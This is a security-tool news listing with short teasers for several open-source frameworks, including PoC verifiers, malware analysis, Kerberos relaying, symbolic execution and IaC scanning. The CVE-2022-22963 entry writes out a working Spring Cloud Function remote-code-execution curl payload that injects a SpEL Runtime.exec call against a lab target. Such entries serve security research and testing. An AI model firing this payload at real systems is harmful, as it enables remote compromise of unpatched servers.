Pocsploit – A Lightweight, Flexible And Novel Open Source Poc Verification Framework

pocsploit is a lightweight, flexible and novel open source poc verification framework Pain points of the POC framework in the market There are too many params, I don’t know how to get started, but only some of them are commonly used. YAML poc framework(like nuclei & xray) is not flexible enough. the conversion cost isRead More

DroidDetective – A Machine Learning Malware Analysis Framework For Android Apps

A machine learning malware analysis framework for Android apps. DroidDetective is a Python tool for analysing Android applications (APKs) for potential malware related behaviour and configurations. When provided with a path to an application (APK file) Droid Detective will make a prediction (using it’s ML model) of if the application is malicious. Features and qualitiesRead More

Xepor – Web Routing Framework For Reverse Engineers And Security Researchers, Brings The Best Of Mitmproxy And Flask

Xepor (pronounced /ˈzɛfə/, zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style. This project is meant to be used with mitmproxy. User write scripts with xepor, and run the script inside mitmproxyRead More

Graphql-Threat-Matrix – GraphQL Threat Framework Used By Security Professionals To Research Security Gaps In GraphQL Implementations

Why graphql-threat-matrix? graphql-threat-matrix was built for bug bounty hunters, security researchers and hackers to assist with uncovering vulnerabilities across multiple GraphQL implementations. The differences in how GraphQL implementations interpret and conform to the GraphQL specification may lead to security gaps and unique attack vectors. By analyzing and comparing the factors that drive the security risksRead More

KrbRelay – Framework For Kerberos Relaying

[*] Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html This should be working on most fully patched Windows systems. There may be difficulties with Server OS in lab environments because of the firewall blocking the OXID resolver however, this will most likely not be an issue during real life engagements, same goes for CLSIDs.Read More

Maat – Open-source Symbolic Execution Framework

Maat is an open-source Dynamic Symbolic Execution and Binary Analysis framework. It provides various functionalities such as symbolic execution, taint analysis, constraint solving, binary loading, environment simulation, and leverages Ghidra’s sleigh library for assembly lifting: https://maat.re Key features: Fast & Portable: Designed to scale to real-world applications. Fully written in C++ for good runtime performance.Read More

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’ Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963

Checkov – Prevent Cloud Misconfigurations During Build-Time For Terraform, CloudFormation, Kubernetes, Serverless Framework And Other Infrastructure-As-Code-Languages

Checkov is a static code analysis tool for infrastructure-as-code. It scans cloud infrastructure provisioned using Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Dockerfile, Serverless or ARM Templates and detects securi ty and compliance misconfigurations using graph-based scanning. Checkov also powers Bridgecrew, the developer-first platform that codifies and streamlines cloud security throughout the development lifecycle. BridgecrewRead More

Chain-Reactor – An Open Source Framework For Composing Executables That Simulate Adversary Behaviors And Techniques On Linux Endpoints

Chain Reactor is an open-source tool for testing detection and response coverage on Linux machines. The tool generates executables that simulate sequences of actions like process creation and network connection. Chain Reactor assumes no prior engineering experience; the tool consumes JSON, so customizing its behavior is as simple as editing a file. Get started ForRead More

X